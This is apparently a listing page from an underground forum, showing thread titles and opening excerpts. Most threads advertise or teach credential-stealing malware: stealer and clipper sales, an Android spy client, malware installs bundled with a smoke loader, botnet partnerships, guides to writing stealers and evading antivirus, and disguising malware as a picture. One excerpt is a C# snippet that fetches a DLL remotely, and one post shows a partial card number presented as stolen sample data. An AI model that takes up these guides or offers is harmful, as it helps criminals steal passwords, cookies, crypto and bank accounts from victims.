
  1. Amadeus_sup

    AMADEUS STEALER - стиллер нового поколения, лучший в своем сегменте

    Представляем вашему вниманию AMADEUS STEALER, предназначенный для сбора логов и удобной работы с ними. AMADEUS собирает максимально необходимую информацию с девайсов потенциальной жертвы. AMADEUS лёгок как в установке, так и в его использовании. При первой же установке весь процесс работы с ним...
  2. Teacher

    We write our own stealer + bypass anti-viruses

    Guide to writing my own stealer! Installing dependencies Before writing the styler itself, we need to install some libraries. This will simplify the writing of the code itself, of course you can write it all yourself, but it will take a lot of time. 1. The most important component of the...
  3. L

    Sell Installs for .exe and .dll

    Sell installs MIX ww, USA, EU, Asia, etc. (* .exe, * .dll)! The source of the installs is the PPI bundle (white soft + our smoke loader). Information about the exchange is not disseminated. From 10k to 20k installs are spilled per day. COST (per 1000 installs): 1. World (MIX): when ordering...
  4. J

    Partnership on Botnet

    Hello guys have botnet If youre good in spreading please dm fast we can cashout crypto+bank logs 50/50 Dm: Time waster blocked
  5. Kozakdru

    Merlynn clipper 2021 30$

    [EN]: [RU]: Открыт предзаказ на Clipper. Clipper - вирусное программное обеспечение, предназначенное для того чтобы отслеживать буфер обмена и подменять чужие крипто-кошельки на ваши. Clipper подменяет: BTC...
  6. BigBeast

    How To Hide Virus/Stealer in a Picture

    Greetings to all readers! Today we will consider one of the simplest ways to disguise malware, and with the help of it, stealers, keyloggers and other nasty things are still masked. 1. Create a folder and drag our picture and virus there. 2. Go to iconvertcom and create an icon for our picture...
  7. Mutt

    Telegram stealer in C #

    This material is provided for educational purposes only and was created as part of the study of information security. The author did not publish material for malicious purposes. If someone uses the information for personal gain, then the author is not responsible for any harm or damage caused...
  8. Hacker

    Create your own stealer in Python + server

    The answer is simple - if you send it directly to a telegram, then the bot token can be intercepted and so steal your logs. Therefore, we will make it so that our stealer first sends a log to our server, and then the server sends us a log to Telegram. Preparing hosting. We buy hosting. I...
  9. Hacker

    Installing Azorult Stealer

    I've seen a lot of distributions, but no installation guides. I decided to write, otherwise why is a stealer needed if 60% of people just stupidly cannot figure out what to do with it. In this thread I will write not only the installation of the stealer, but also the distribution (there will not...
  10. Hacker

    Writing a stealer sending data to a server (located in the Tor network)

    This article is a logical continuation of the last article I laid out, in which the .onion site was created and raised: All programs in this article will be written in the Go programming language. Now is the time to use our created site as a server for accepting requests and storing data. To...
  11. H

    masked and encrypted stealer

    HI, do anybody know where i can get a masked and encrypted stealer for a mobile phone?
  12. Kozakdru

    Jester Stealer 2021 99$

    Jester Stealer - it is a new multifunctional styler, unique in its kind. The best software for carders. A build that is connected to our panel in Tor, it is possible to agree to install the panel on the client's server. Collection in memory, safety, work with tor, affordable price, convenient...
  13. Hacker

    We write a stealer. How to get your hands on Chrome and Firefox passwords.

    The content of the article 1. What will the antivirus say? 2. Chrome 3. Firefox 4. Network Security Services (NSS) 5. Conclusion So, browsers based on Chrome or Firefox store usernames and passwords encrypted in a SQLite database. This DBMS is compact and distributed free of charge under a...
  14. Hacker

    Dynamic DLL loading (writing a 9kb stealer)

    We will use the System.Reflections namespace public static byte[] GetLibrary() { byte[] dll = new byte[0]; string url = ""; using (var client = new WebClient()) { try { dll...
  15. Mutt

    How to secretly copy cookies to your USB flash drive? Stealer in BAT file.

    So, the first and main thing that is required for this is a USB flash drive with data. Below is its content. As you can see, there are two folders and two files here - a batch file and a file for autorun. The file for autorun contains a command that says that the batch file will be opened at...
  16. K

    Selling German bank fulldata / logs.

    Hello, we are looking forward to buy EZ sparkasse bank account logs. The logs must include * Name of the bank * Username password * Phone number of the victim and address if possible... ACCOUNTS MUST HAVE ECHTZEIT BOX SELECTED! Here i drop some sample data: Kartennummer: '5171165145...
  17. nflsxx


    •━────────────────────━❪ʚĭɞ❫━────────────────────━ Android Spyclient non root non public Шпионский клиент андроид самописный не паблик Price: 150$ Source - viewing messages - view calls - view notifications - current geolocation - file manager - works hidden without notifications - listening...
  18. Teacher

    How the Storm Kitty stealer works

    It is well known that if you suddenly forgot the password for the service, but it is saved in your browser, you can remove it from there. However, it is known that any Trojan that accidentally enters a computer with the same ease will retrieve the stored passwords. Today we will take a look at...
  19. Lord777

    Assembling the stealer for get logs - Echelon Stealer v6

    Hello to everyone, dear friends! Today we will build our stealer from the sources of Echelon Stealer v6. Let's go! Functional Browsers: all Chromium-based browsers, all Gecko-based (Mozilla) browsers including x32 and x64 versions, old versions of Edge and i.e., recursive collection of all...
  20. Lord777

    Selling and buying Trojans in the underground market

    Content 1. Selling and buying Trojans 1.1 N0F1L3 1.2 Kratos 1.3 AZORult 1.4 Eredel 1.5 Kpot 1.6 Arkei 1.7 Pony 1.8 Predator The Thief 2. Total Among commercial Trojans, a separate niche is occupied by stealers and similar spyware. It is not surprising: other people's secrets have always been...